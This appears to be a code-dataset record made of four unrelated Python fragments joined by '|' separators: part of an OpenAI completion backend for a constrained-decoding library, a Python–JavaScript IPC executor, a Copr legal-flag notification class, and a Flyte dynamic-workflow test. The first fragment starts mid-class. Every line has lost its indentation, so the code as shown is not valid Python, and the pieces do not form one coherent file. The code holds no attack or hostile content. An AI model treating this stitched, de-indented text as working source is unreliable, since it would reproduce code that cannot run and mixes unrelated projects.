self.model_identifier = ('openai/' + self.model.model_identifier)
if (kwargs.get('openai_chunksize', None) is not None):
warnings.warn("Warning: openai_chunksize is deprecated. Please use 'chunksize' instead.")
kwargs['chunksize'] = kwargs['openai_chunksize']
self.model.chunk_size = kwargs.get('chunksize', (64 if (not self.mock) else 8))
self.model.nostop = kwargs.get('openai_nonstop', False)
self.num_billed_tokens = {}
self.num_requests = 0
kwargs['tokenizer'] = tokenizer
self.api_config = {**({'endpoint': endpoint} if (endpoint is not None) else {}), **kwargs}
self.extra_decoding_parameters = {**({'top_p': kwargs.get('top_p')} if ('top_p' in kwargs) else {}), **({'frequency_penalty': kwargs.get('frequency_penalty')} if ('frequency_penalty' in kwargs) else {}), **({'presence_penalty': kwargs.get('presence_penalty')} if ('presence_penalty' in kwargs) else {})}
if ('top_k' in kwargs):
warnings.warn("'top_k' is not supported by the OpenAI API and will thus be ignored.", openai.OpenAIAPIWarning)
if ('repetition_penalty' in kwargs):
warnings.warn("'repetition_penalty' is not supported by the OpenAI API and will thus be ignored.", openai.OpenAIAPIWarning)
self.timeout = kwargs.get('chunk_timeout', (2.5 if (not self.mock) else 4.5))
self.stats = Stats('openai')
openai.AsyncConfiguration.set_tokenizer(self.tokenize)
assert (not ('hf-' in self.tokenizer.name)), "OpenAI models are not compatible with HuggingFace tokenizers. Please use 'tiktoken' or 'gpt3_tokenizer' instead."
def log_billable_tokens(self, n: int):
pass
def log_queries(self, n: int):
pass
def prepare_completion_call(self, s, mask, sampling_mode, **kwargs):
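# Decide how to realize the current token mask as an OpenAI completion: unconstrained ('*'), a single forced token ('fixed'), or a logit_bias mask ('complete'), with invert set when listing the allowed tokens needs fewer bias entries.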
stopping_phrases = s.data('head').stopping_phrases['text']
if (mask is None):
return CompletionCall('*', None, s.input_ids, kwargs, stopping_phrases=stopping_phrases, sampling_mode=sampling_mode)
invert = False
num_allowed = masks.mask_num_allowed(mask)
assert (num_allowed > 0), 'DclibOpenAiModel: encountered logits mask with no allowed tokens: mask: {} mask type:{}'.format(mask, type(mask))
if (num_allowed == 1):
token_id = masks.mask_get_only_allowed(mask)
token = self.tokenizer.decode_bytes([token_id])[0]
if masks.mask_is_allowed(mask, self.eos_token_id):
return CompletionCall('fixed', token, s.input_ids, kwargs, stopping_phrases=stopping_phrases, sampling_mode=sampling_mode)
else:
return CompletionCall('fixed', token, s.input_ids, kwargs, stopping_phrases=stopping_phrases, sampling_mode=sampling_mode)
elif (num_allowed < self.tokenizer.model_vocab_size):
if ((self.tokenizer.model_vocab_size - num_allowed) > num_allowed):
invert = True
else:
return CompletionCall('*', None, s.input_ids, kwargs, stopping_phrases=stopping_phrases, sampling_mode=sampling_mode)
return CompletionCall('complete', mask, s.input_ids, kwargs, invert=invert, stopping_phrases=stopping_phrases, sampling_mode=sampling_mode)
async def api_score(self, input_ids, offset):
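# Score an existing sequence by requesting a completion with max_tokens=0 and echo=True, collecting the per-token logprobs and returning the entries after the given offset.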
if ((len(input_ids) > 0) and (input_ids[0] == self.tokenizer.bos_token_id)):
input_ids = input_ids[1:]
prompt_str = self.tokenizer.convert_bytes_to_string(input_ids)
if ('<|endoftext|>' in prompt_str):
prompt_str = (await self.tokenize(prompt_str))
kwargs = {'model': self.model.model_identifier, 'prompt': prompt_str, 'max_tokens': 0, 'temperature': 0, 'logprobs': 1, 'user': 'lmql', 'echo': True, **({'api_config': self.api_config} if (self.api_config is not None) else {}), 'tracer': active_tracer(), **({'timeout': self.timeout} if (self.timeout is not None) else {})}
logprobs = []
async for data in (await openai.Completion.create(**kwargs)):
logprobs += data['logprobs']['token_logprobs']
logprobs = [(0.0 if (v is None) else v) for v in logprobs]
return np.array(logprobs[offset:], dtype=np.float32)
async def queue_api_score(self, kwargs):
loop = asyncio.get_running_loop()
result_fut = loop.create_future()
self.score_queue.put_nowait((kwargs, result_fut))
return (await result_fut)
async def _score_next_tokens(self, s, next_tokens, noscore=False):
if noscore:
return np.zeros(len(next_tokens), dtype=np.float32)
res = (await self.api_score(np.concatenate([s.input_ids, next_tokens], axis=0), len(s.input_ids)))
server_side_swallowed_tokens = 0
while (len(res) < len(next_tokens)):
res = np.append(res, 0.0)
server_side_swallowed_tokens += 1
if (server_side_swallowed_tokens > 0):
warnings.warn('warning: The OpenAI API has merged {} token(s) server-side, which will reflect in inaccurate 0.0 scores in the decoding tree'.format(server_side_swallowed_tokens))
return res
async def score(self, sqs: List[DecoderSequence], tokens: List[List[bytes]], max_batch_size=4, deterministic: Union[(bool, List[bool])]=False, stop_phrase=False, needs_rewrite=True, user_data=None, noscore=False, internal=False):
assert (len(sqs) == len(tokens)), 'Number of sequences and number of tokens to be scored must match, but got {} and {}'.format(len(sqs), len(tokens))
if (user_data is None):
user_data = {}
user_data['openai-continuations'] = None
def make_detseq(s, token_score, completion):
if (type(deterministic) is bool):
deterministic_flags = np.concatenate([s.deterministic, np.array([deterministic])], dtype=np.bool_)
next_deterministic = np.array(([deterministic] * len(completion[1:])))
else:
assert ((type(deterministic) is list) and (len(deterministic) == len(completion))), 'If deterministic is a list, it must have the same length as the number of tokens to be scored, but is {} and {}'.format(deterministic, completion)
deterministic_flags = np.concatenate([s.deterministic, np.array(deterministic[:1])], dtype=np.bool_)
next_deterministic = np.array(deterministic[1:])
return detseq(ids=np.concatenate([s.input_ids, completion[:1]], axis=0), next_ids=completion[1:], logprobs=np.concatenate([s.logprobs, token_score[:1]], axis=0), next_logprobs=token_score[1:], deterministic=deterministic_flags, next_deterministic=next_deterministic, predecessor=s, user_data=user_data, stop_phrase=np.concatenate([s.stop_phrase, np.array([stop_phrase])]), needs_rewrite=needs_rewrite, sticky_user_data_keys=s.sticky_user_data_keys, internal=internal)
results = []
async for (s, tokens, scores) in self.score_tokens(sqs, tokens, max_batch_size=max_batch_size, noscore=noscore):
results.append(make_detseq(s, scores, tokens))
return results
async def score_tokens(self, sqs: List[DecoderSequence], tokens: List[List[bytes]], max_batch_size=None, noscore=False):
completion = [np.array(cont) for cont in tokens]
for (s, tokens, scores) in zip(sqs, completion, (await asyncio.gather(*(self._score_next_tokens(s, compl, noscore=noscore) for (s, compl) in zip(sqs, completion))))):
(yield (s, tokens, scores))
async def async_complete(self, completion_call: Union[(CompletionCall, List[CompletionCall])], **kwargs) -> openai.response_buffer:
assert (type(completion_call) is CompletionCall)
batch_size = 1
input_ids = completion_call.input_ids.reshape((- 1))
prompt_str = self.tokenizer.convert_bytes_to_string(input_ids)
tokenized_input_ids = (await self.tokenize(prompt_str))
if ((len(input_ids) > 0) and (input_ids[0] == self.tokenizer.bos_token_id)):
input_ids = input_ids[1:]
temperature = completion_call.kwargs.get('temperature', 0.0)
logprobs = completion_call.kwargs.get('logprobs', 5)
noscore = completion_call.kwargs.get('noscore', False)
max_tokens = (completion_call.kwargs.get('max_tokens_hint') or self.model.chunk_size)
kwargs = {'model': self.model.model_identifier, 'prompt': prompt_str, 'max_tokens': max_tokens, 'temperature': temperature, 'logprobs': logprobs, 'user': 'lmql', 'stream': True, 'echo': True, **({'api_config': self.api_config} if (self.api_config is not None) else {}), **({'timeout': self.timeout} if (self.timeout is not None) else {}), **self.extra_decoding_parameters}
mode = completion_call.mode
if (mode == '*'):
pass
elif (mode == 'complete'):
logit_bias = completion_call.api_mask
if ((len(logit_bias) > 0) and (max(logit_bias.values()) == 100) and (len(logit_bias) < 10)):
kwargs['max_tokens'] = min(kwargs['max_tokens'], 4)
kwargs.update({'logit_bias': logit_bias})
elif (mode == 'fixed'):
fixed_next_token = completion_call.logit_mask_or_fixed_id
if (fixed_next_token == self.eos):
return CompletionResult(openai.response_buffer.singleton(token=fixed_next_token, token_logprob=0), completion_call.continuation_type, completion_call.logit_mask_or_fixed_id)
else:
if noscore:
logprob = 0.0
else:
logprob = (await self.api_score(np.append(input_ids, nputil.ensure_array(fixed_next_token).reshape((- 1)), axis=0), (- 1)))
return CompletionResult(openai.response_buffer.singleton(token=fixed_next_token, token_logprob=logprob), completion_call.continuation_type, completion_call.logit_mask_or_fixed_id)
else:
assert False, f'Internal openai API dispatcher returned an unknown completion mode {mode}'
if (len(completion_call.stopping_phrases) > 0):
if (len(completion_call.stopping_phrases) > 4):
warnings.warn('warning: the number of stopping phrases that would need to be passed to the OpenAI API is greater than 4. Since the OpenAI API only supports up to 4 stopping phrases, the first 4 stopping phrases will be passed to the API. Other stopping phrases will also be enforced, but may lead to an increase in the number of tokens billed to the user.')
if (not self.model.nostop):
kwargs.update({'stop': completion_call.stopping_phrases[:4]})
kwargs['tracer'] = active_tracer()
buffer = (await openai.async_buffer((await openai.Completion.create(**kwargs)), tokenizer=self.tokenize_list))
t = b''
to_skip = b''.join(input_ids)
if (len(input_ids) == 0):
to_skip = b'<|endoftext|>'
while (len(t) < len(to_skip)):
skipped = (await buffer.get(0))
skipped = skipped['logprobs']['tokens']
skipped = b''.join(self.convert([skipped]))
t += skipped
buffer = buffer[1:]
return CompletionResult(buffer, completion_call.continuation_type, completion_call.logit_mask_or_fixed_id)
async def tokenize_list(self, tokens: List[str]):
if ((len(tokens) > 0) and (type(tokens[0]) is str)):
return [[t[0]] for t in (await self.model.tokenize(tokens))]
return tokens
def count_billed_tokens(self, n, model):
if (model not in self.num_billed_tokens.keys()):
self.num_billed_tokens[model] = 0
self.num_billed_tokens[model] += n
self.num_requests += 1
async def completion_buffer(self, seqs, temperature=1, sampling_modes=None, **kwargs):
kwargs.update({'temperature': temperature})
if (sampling_modes is None):
sampling_modes = ['top-1' for _ in range(len(seqs))]
async def get_buffer(i, s):
constrained_seqs = np.array([s.is_query_constrained], dtype=np.bool_)
logits_mask_result = (await self.compute_logits_mask(s.input_ids.reshape(1, (- 1)), [s.user_data], constrained_seqs, [s], **kwargs))
logits_mask = logits_mask_result.logits_mask[0]
kwargs['max_tokens_hint'] = logits_mask_result.max_tokens_hints[0]
if (s.user_data is None):
s.user_data = {}
s.user_data = deepmerge(deepcopy(s.user_data), logits_mask_result.user_data[0])
s.user_data['set_by'] = 'where'
completion_call = self.prepare_completion_call(s, logits_mask, sampling_modes[i], **kwargs)
if (s.data('openai-continuations') is not None):
continuations: CompletionResult = s.data('openai-continuations')
continuation_type = completion_call.continuation_type
if (continuation_type in continuations):
continuation = continuations[continuation_type]
if (await continuation.buffer.empty()):
del s.data('openai-continuations')[continuation_type]
else:
return continuation
if (is_deterministic(s) and (len(s.next_ids) > 0)):
return CompletionResult(openai.response_buffer.singleton(token=s.next_ids[0], token_logprob=s.next_logprobs[0]), None, None)
completion_result = (await self.async_complete(completion_call))
if (self.cache_delegate is not None):
(await self.expand_and_cache(s, completion_result, sampling_modes[i], logprobs=kwargs.get('logprobs', 1)))
assert (not (await completion_result.buffer.empty())), 'Completion result is empty on arrival: {}'.format(str([(await self.detokenize(completion_call.input_ids))]))
return completion_result
return (await asyncio.gather(*[get_buffer(i, s) for (i, s) in enumerate(seqs)]))
async def expand_and_cache(self, s: DecoderSequence, completion_result: CompletionResult, sampling_mode, logprobs=1):
_res = (await completion_result.buffer.get(0))
async def token_stream():
nonlocal sampling_mode, s, completion_result
response_buffer = completion_result.buffer
tokens = []
scores = []
while True:
try:
if (await response_buffer.empty()):
break
res = (await response_buffer.get(0))
top_entries = {}
topprobs = res['logprobs']['top_logprobs']
if ((topprobs is not None) and (logprobs > 1)):
topk_tokens = list(topprobs.items())
topk_tokens = [(tok, score) for ((tok_str, score), tok) in zip(topk_tokens, [s for (s, _) in topk_tokens])]
topk_tokens += [(tokens[0], scores)]
topk_tokens = list(dict.fromkeys(topk_tokens))
topk_tokens = sorted(topk_tokens, key=(lambda x: x[1]), reverse=True)
topk_tokens = topk_tokens[:logprobs]
top_entries = {tok: score for (tok, score) in topk_tokens}
scores = {}
for (t, s) in top_entries.items():
scores[t] = s
if (sampling_mode == 'top-1'):
scores[res['logprobs']['tokens']] = res['logprobs']['token_logprobs']
top_entries = list(sorted(scores.items(), key=(lambda x: x[1]), reverse=True))
tokens = [t for (t, _) in top_entries]
scores = [s for (_, s) in top_entries]
edge_type = ['top-{}'.format((i + 1)) for i in range(len(tokens))]
if (sampling_mode != 'top-1'):
tokens = ([res['logprobs']['tokens']] + tokens)
scores = ([res['logprobs']['token_logprobs']] + scores)
edge_type = ([sampling_mode] + edge_type)
tokens = self.convert(tokens)
response_buffer = response_buffer[1:]
continuation = CompletionResult(response_buffer, completion_result.continuation_type, completion_result.logit_mask_or_fixed_id)
if (continuation.continuation_type is None):
edge_type = None
user_data = {'openai-continuations': {continuation.continuation_type: continuation}}
if ('sample-id' in sampling_mode):
user_data['dc-edge-type'] = sampling_mode
scores = [(0.0 if (str(s) == '[]') else s) for s in scores]
(yield (s, tokens, scores, edge_type, user_data))
except IndexError:
break
self.register_token_stream(token_stream)
async def argmax(self, sequences, **kwargs):
return (await self.sample(sequences, num_samples=1, temperature=0, **kwargs))
def report_stats(self, printer, decoder_step=None):
if (printer is None):
return
if hasattr(printer, 'report_model_stats'):
s = openai.Completion.get_stats()
data = {'tokens': s.tokens, 'model': self.model_identifier, 'req.': s.requests, 'avb': f'{(float(s.sum_batch_size) / max(1, s.requests)):.2f}'}
if (decoder_step is not None):
data['_step'] = decoder_step
printer.report_model_stats(**data)
async def sample(self, sequences, num_samples=1, **kwargs):
kwargs = {**self.model_args, **kwargs}
async def op_sample(seqs):
temperature = kwargs.get('temperature', 1.0)
if (temperature == 0.0):
sampling_modes = ['top-1' for _ in range(len(seqs))]
edge_type_populated_user_data = [{} for _ in range(len(seqs))]
else:
sampling_modes = [f'sample-{temperature}-sample-id-{random.randint(0, ((2 ** 32) - 1))}' for _ in range(len(seqs))]
edge_type_populated_user_data = [{'dc-edge-type': sm} for sm in sampling_modes]
completions: List[CompletionResult] = (await self.completion_buffer(seqs, logprobs=num_samples, sampling_modes=sampling_modes, **kwargs))
next_token_ids = []
next_token_scores = []
logits = []
continuation_buffers: List[CompletionResult] = []
for (s, completion) in zip(seqs, completions):
assert (not (await completion.buffer.empty())), 'Completion buffer is empty {}'.format(completion.buffer)
complete_data = (await completion.buffer.get(0))
continuation = CompletionResult(completion.buffer[1:], completion.continuation_type, completion.logit_mask_or_fixed_id)
continuation_buffers.append(continuation)
if ('fixed' in complete_data.keys()):
next_token = [complete_data['logprobs']['tokens']]
next_token_score = complete_data['logprobs']['token_logprobs']
if (str(next_token_score) == '[]'):
next_token_score = np.array([0.0])
next_token_ids.append(np.array([next_token]))
next_token_scores.append(np.array([next_token_score], dtype=np.float32))
full_logits = TokenDistribution()
full_logits[next_token] = next_token_score
logits.append(full_logits)
continue
next_token = complete_data['logprobs']['tokens']
next_token_score = (complete_data['logprobs']['token_logprobs'] or 0.0)
if (complete_data['logprobs']['top_logprobs'] is None):
complete_data['logprobs']['top_logprobs'] = {complete_data['logprobs']['tokens']: 0.0}
probs = sorted(list(complete_data['logprobs']['top_logprobs'].items()))
logprobs = [p[1] for p in probs]
tokens = [p[0] for p in probs]
distribution = TokenDistribution()
distribution[tokens] = logprobs
distribution[next_token] = np.finfo(np.float32).min
mask = completion.logit_mask_or_fixed_id
if (mask is None):
pass
elif (type(mask) is int):
distribution[mask] = np.finfo(np.float32).min
else:
distribution[(mask < 0)] = np.finfo(np.float32).min
(additional_sampled_token_ids, _) = distribution.sample(num_samples=(num_samples - 1))
seq_next_token_ids = ([next_token] + additional_sampled_token_ids)
distribution[next_token] = next_token_score
seq_next_token_scores = distribution.score(seq_next_token_ids)
next_token_ids.append(seq_next_token_ids)
next_token_scores.append(seq_next_token_scores)
logits.append(distribution)
next_token_ids = [self.convert(t) for t in next_token_ids]
def successor_user_data(continuation_buffer: SequenceResult, num_successors, user_data):
default_user_data = {**user_data}
if (continuation_buffer.continuation_type is None):
return ([default_user_data.copy()] * num_successors)
continuation_as_user_data = {'openai-continuations': {continuation_buffer.continuation_type: continuation_buffer}, **default_user_data.copy()}
return ([continuation_as_user_data] + ([default_user_data.copy()] * (num_successors - 1)))
return [s.make_successors(next_token_ids[i], next_token_scores[i], logits=logits[i], user_data=successor_user_data(continuation_buffers[i], len(next_token_ids[i]), edge_type_user_data)) for (i, s, edge_type_user_data) in zip(range(len(seqs)), seqs, edge_type_populated_user_data)]
with self.stats.timer('sample'):
return (await sequences.aelement_wise(op_sample))
def frombytes(self, s):
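# Turn an escaped byte string (e.g. '\\xe2\\x80') back into raw bytes; characters outside an escape sequence are mapped through ord().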
r = []
i = 0
while (i < len(s)):
if (s[i:(i + 2)] == '\\x'):
if (len(s) < (i + 3)):
r += [ord(s[i])]
i += 1
else:
r += [int(s[(i + 2):(i + 4)], 16)]
i += 4
else:
r += [ord(s[i])]
i += 1
return bytes(r)
def convert(self, token):
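# Normalize tokens to byte values: ints and numeric arrays pass through, 'bytes:'-prefixed strings are unescaped, plain strings are UTF-8 encoded.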
result = []
for t in token:
if ((type(t) is int) or (type(t) is np.int64) or ((type(t) is np.ndarray) and (t.dtype != np.str_))):
result.append(t)
elif (type(t) is bytes):
result.append(t)
elif t.startswith('bytes:'):
result.append(self.frombytes(t[6:]))
else:
result.append(t.encode('utf-8'))
return result
async def topk_continuations(self, sequences, k, **kwargs):
assert (k <= 5), 'The OpenAI API only supports topk probabilities with k <= 5'
assert (k >= 1), 'topk_continuations() requires k >= 1'
assert (not model_info(self.model_identifier).is_chat_model), f"Chat API models do not support topk_continuations which is required for the requested decoding algorithm, use 'sample' or 'argmax' instead."
kwargs = {**self.model_args, **kwargs}
kwargs.update({'temperature': 0.0})
async def op_topk(seqs):
completions: List[CompletionResult] = (await self.completion_buffer(seqs, logprobs=k, **kwargs))
next_token_ids = []
next_token_scores = []
logits = []
continuation_buffers: List[CompletionResult] = []
for (s, completion) in zip(seqs, completions):
complete_data = (await completion.buffer.get(0))
continuation = CompletionResult(completion.buffer[1:], completion.continuation_type, completion.logit_mask_or_fixed_id)
continuation_buffers.append(continuation)
if ('fixed' in complete_data.keys()):
next_token = [complete_data['logprobs']['tokens']]
next_token_score = complete_data['logprobs']['token_logprobs']
if (str(next_token_score) == '[]'):
next_token_score = np.array([0.0])
next_token_ids.append(np.array([next_token]))
next_token_scores.append(np.array([next_token_score], dtype=np.float32))
distribution = TokenDistribution()
distribution[next_token] = next_token_score
logits.append(distribution)
continue
next_token = complete_data['logprobs']['tokens']
next_token_score = complete_data['logprobs']['token_logprobs']
probs = sorted(list(complete_data['logprobs']['top_logprobs'].items()), key=(lambda x: x[1]), reverse=True)
logprobs = [p[1] for p in probs]
tokens = [p[0] for p in probs]
distribution = TokenDistribution()
distribution[tokens] = logprobs
mask = completion.logit_mask_or_fixed_id
if (mask is None):
pass
elif (type(mask) is int):
distribution[mask] = np.finfo(np.float32).min
else:
distribution[(mask < 0)] = np.finfo(np.float32).min
(tokens, logprobs) = distribution.topk(k=k)
next_token_ids.append(tokens)
next_token_scores.append(logprobs)
logits.append(distribution)
next_token_ids = [self.convert(t) for t in next_token_ids]
def successor_user_data(continuation_buffer: SequenceResult, num_successors):
default_user_data = {}
if (continuation_buffer.continuation_type is None):
return ([default_user_data.copy()] * num_successors)
continuation_as_user_data = {'openai-continuations': {continuation_buffer.continuation_type: continuation_buffer}, **default_user_data.copy()}
return ([continuation_as_user_data] + ([default_user_data.copy()] * (num_successors - 1)))
return [s.make_successors(next_token_ids[i], next_token_scores[i], logits=logits[i], user_data=successor_user_data(continuation_buffers[i], len(next_token_ids[i]))) for (i, s) in enumerate(seqs)]
with self.stats.timer('topk'):
return (await sequences.aelement_wise(op_topk))
def close(self):
pass |
class Executor():
def __init__(self, loop):
self.loop = loop
loop.pyi.executor = self
self.queue = loop.queue_request
self.i = 0
self.bridge = self.loop.pyi
def ipc(self, action, ffid, attr, args=None):
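# Issue a single request to the JavaScript side and block (10s timeout) until the response with the matching request id arrives.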
self.i += 1
r = self.i
l = None
if (action == 'get'):
l = self.queue(r, {'r': r, 'action': 'get', 'ffid': ffid, 'key': attr})
elif (action == 'init'):
l = self.queue(r, {'r': r, 'action': 'init', 'ffid': ffid, 'key': attr, 'args': args})
elif (action == 'inspect'):
l = self.queue(r, {'r': r, 'action': 'inspect', 'ffid': ffid, 'key': attr})
elif (action == 'serialize'):
l = self.queue(r, {'r': r, 'action': 'serialize', 'ffid': ffid})
elif (action == 'blob'):
l = self.queue(r, {'r': r, 'action': 'blob', 'ffid': ffid})
elif (action == 'set'):
l = self.queue(r, {'r': r, 'action': 'set', 'ffid': ffid, 'key': attr, 'args': args})
elif (action == 'keys'):
l = self.queue(r, {'r': r, 'action': 'keys', 'ffid': ffid})
else:
assert False, f"Unhandled action '{action}'"
if (not l.wait(10)):
if (not config.event_thread):
print(config.dead)
print('Timed out', action, ffid, attr, repr(config.event_thread))
raise Exception(f"Timed out accessing '{attr}'")
(res, barrier) = self.loop.responses[r]
del self.loop.responses[r]
barrier.wait()
if ('error' in res):
raise JavaScriptError(attr, res['error'])
return res
def pcall(self, ffid, action, attr, args, *, timeout=1000, forceRefs=False):
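# Remote call with two-phase argument passing: proxied JS objects are referenced by ffid, plain values are sent inline; when Python objects must be reflected to JS, a pre-response first assigns them ffids before the call result is awaited.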
wanted = {}
self.ctr = 0
(callRespId, ffidRespId) = ((self.i + 1), (self.i + 2))
self.i += 2
self.expectReply = False
packet = {'r': callRespId, 'action': action, 'ffid': ffid, 'key': attr, 'args': args}
def ser(arg):
if hasattr(arg, 'ffid'):
self.ctr += 1
return {'ffid': arg.ffid}
else:
self.ctr += 1
self.expectReply = True
wanted[self.ctr] = arg
return {'r': self.ctr, 'ffid': ''}
if forceRefs:
(_block, _locals) = args
packet['args'] = [args[0], {}]
flocals = packet['args'][1]
for k in _locals:
v = _locals[k]
if ((type(v) is int) or (type(v) is float) or (v is None) or (v is True) or (v is False)):
flocals[k] = v
else:
flocals[k] = ser(v)
packet['p'] = self.ctr
payload = json.dumps(packet)
else:
payload = json.dumps(packet, default=ser)
payload = (payload[:(- 1)] + f',"p":{self.ctr}}}')
l = self.loop.queue_request(callRespId, payload)
if self.expectReply:
l2 = self.loop.await_response(ffidRespId)
if (not l2.wait(timeout)):
raise Exception('Execution timed out')
(pre, barrier) = self.loop.responses[ffidRespId]
del self.loop.responses[ffidRespId]
if ('error' in pre):
raise JavaScriptError(attr, pre['error'])
for requestId in pre['val']:
ffid = pre['val'][requestId]
self.bridge.m[ffid] = wanted[int(requestId)]
try:
if hasattr(self.bridge.m[ffid], '__call__'):
setattr(self.bridge.m[ffid], 'iffid', ffid)
except Exception:
pass
barrier.wait()
if (not l.wait(timeout)):
if (not config.event_thread):
print(config.dead)
raise Exception(f"Call to '{attr}' timed out. Increase the timeout by setting the `timeout` keyword argument.")
(res, barrier) = self.loop.responses[callRespId]
del self.loop.responses[callRespId]
barrier.wait()
if ('error' in res):
raise JavaScriptError(attr, res['error'])
return (res['key'], res['val'])
def getProp(self, ffid, method):
resp = self.ipc('get', ffid, method)
return (resp['key'], resp['val'])
def setProp(self, ffid, method, val):
self.pcall(ffid, 'set', method, [val])
return True
def callProp(self, ffid, method, args, *, timeout=None, forceRefs=False):
resp = self.pcall(ffid, 'call', method, args, timeout=timeout, forceRefs=forceRefs)
return resp
def initProp(self, ffid, method, args):
resp = self.pcall(ffid, 'init', method, args)
return resp
def inspect(self, ffid, mode):
resp = self.ipc('inspect', ffid, mode)
return resp['val']
def keys(self, ffid):
return self.ipc('keys', ffid, '')['keys']
def free(self, ffid):
self.loop.freeable.append(ffid)
def get(self, ffid):
return self.bridge.m[ffid] |
class LegalFlagMessage(Message):
def __init__(self, copr, reporter, reason):
self.subject = 'Legal flag raised on {0}'.format(copr.name)
self.text = '{0}\nNavigate to {1}\nContact on owner is: {2} <{3}>\nReported by {4} <{5}>'.format(reason, flask.url_for('admin_ns.legal_flag', _external=True), copr.user.username, copr.user.mail, reporter.name, reporter.mail) |
def test_dc_dyn_directory(folders_and_files_setup):
proxy_c = MyProxyConfiguration(splat_data_dir='/tmp/proxy_splat', apriori_file='/opt/config/a_file')
proxy_p = MyProxyParameters(id='pp_id', job_i_step=1)
my_input_gcs = MyInput(main_product=FlyteFile(folders_and_files_setup[0]), apriori_config=MyAprioriConfiguration(static_data_dir=FlyteDirectory('gs://my-bucket/one'), external_data_dir=FlyteDirectory('gs://my-bucket/two')), proxy_config=proxy_c, proxy_params=proxy_p)
my_input_gcs_2 = MyInput(main_product=FlyteFile(folders_and_files_setup[0]), apriori_config=MyAprioriConfiguration(static_data_dir=FlyteDirectory('gs://my-bucket/three'), external_data_dir=FlyteDirectory('gs://my-bucket/four')), proxy_config=proxy_c, proxy_params=proxy_p)
@dynamic
def dt1(a: List[MyInput]) -> List[FlyteDirectory]:
x = []
for aa in a:
x.append(aa.apriori_config.external_data_dir)
return x
ctx = FlyteContextManager.current_context()
cb = ctx.new_builder().with_serialization_settings(SerializationSettings(project='test_proj', domain='test_domain', version='abc', image_config=ImageConfig(Image(name='name', fqn='image', tag='name')), env={})).with_execution_state(ctx.execution_state.with_params(mode=ExecutionState.Mode.TASK_EXECUTION))
with FlyteContextManager.with_context(cb) as ctx:
input_literal_map = TypeEngine.dict_to_literal_map(ctx, d={'a': [my_input_gcs, my_input_gcs_2]}, type_hints={'a': List[MyInput]})
dynamic_job_spec = dt1.dispatch_execute(ctx, input_literal_map)
assert (dynamic_job_spec.literals['o0'].collection.literals[0].scalar.blob.uri == 'gs://my-bucket/two')
assert (dynamic_job_spec.literals['o0'].collection.literals[1].scalar.blob.uri == 'gs://my-bucket/four') |